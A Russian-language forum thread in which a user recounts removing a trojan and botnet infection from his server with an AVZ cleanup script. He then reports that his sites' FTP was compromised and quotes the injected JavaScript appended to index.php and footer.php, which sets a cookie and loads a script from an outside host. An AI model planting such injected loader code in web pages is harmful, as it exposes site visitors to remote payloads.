Печать

Пожалуйста, войдите или зарегистрируйтесь.
1 час 1 день 1 неделя 1 месяц Навсегда

[san]

Уже наверно месяц с ним бьюсь с переменным успехом...
sadrive32.exe одолел мой сервер и никак я его ни поймать не мог ни вычистить...

Сегодня нашел скрипт на форуме http://virusinfo.info/showthread.php?t=118003&s=05b37365f301f4025e9acb4ef0d24789

Код: [Выделить]

ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('C:\WINDOWS\system32\46.exe','');
 QuarantineFile('c:\RECYCLER\R-1-5-21-1482476501-1644491937-682003330-1013\ecleaner.exe','');
 QuarantineFile('D:\ProgFile\PROFILES\Администратор\Application Data\Vgicix.exe','');
 QuarantineFile('C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1830\zaberg.exe','');
 TerminateProcessByName('c:\windows\sadrive32.exe');
 QuarantineFile('c:\windows\sadrive32.exe','');
 TerminateProcessByName('d:\progfile\profiles\Администратор\application data\15.tmp');
 QuarantineFile('d:\progfile\profiles\Администратор\application data\15.tmp','');
 DeleteFile('d:\progfile\profiles\Администратор\application data\15.tmp');
 DeleteFile('c:\windows\sadrive32.exe');
 DeleteFile('C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1830\zaberg.exe');
 RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','zaber0');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','Microsoft Driver Setup');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run','Microsoft Driver Setup');
 DeleteFile('D:\ProgFile\PROFILES\Администратор\Application Data\Vgicix.exe');
 DeleteFile('c:\RECYCLER\R-1-5-21-1482476501-1644491937-682003330-1013\ecleaner.exe');
 RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','Vgicix');
 DeleteFile('C:\WINDOWS\system32\46.exe');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows NT\CurrentVersion\Winlogon','Taskman');
RebootWindows(true);сам скрипт глушил сервер в момент остановки tcpip, поэтому пришлось руками пройтись по папкам и реестру и проделать всю указанную в скрипте работу.

посмотрим на сколько времени я от него отпинался на этот раз...

[dr-volder]

Пока что не встречал непроходимых вирусов. Поэтому удачи тебе в борьбе с узурпатором!

[san]

ничего не получается
там какойто ирк троян + червяк + инсайдер + экплойты...
короче похоже в ботсеть меня вписали... сейчас карпер борется с этой гадостью покругу - одну голову отрубает, на ее месте еще парочка вырастает... 
бъемся

[san]

настроил блокирование исходящего соединения...
эта сволочь долбится каждую минуту 

[san]

сегодня заглянул на фитовод - он не грузится. полез на фтп...
во всех папках во всех файлах index.php и footer.php дописан скрипт:

Код: [Выделить]

<script>function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime() (2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires=" e.toGMTString() ";path=/";document.write('<scr' 'ipt src="http://mainrating.org/mainrating.js"></scr' 'ipt>');}</script>
причем не на одном фитоводе, а на всех моих сайтах...

похоже фтп подломили, потомучто дата всех измененных файлов 27.10.2012 12:42

ремонта блин на целый день... 

В быстром ответе можно использовать BB-теги и смайлы.

Предупреждение: в данной теме не было сообщений более 120 дней.
Если не уверены, что хотите ответить, то лучше создайте новую тему.

Имя: E-mail:
Визуальная проверка: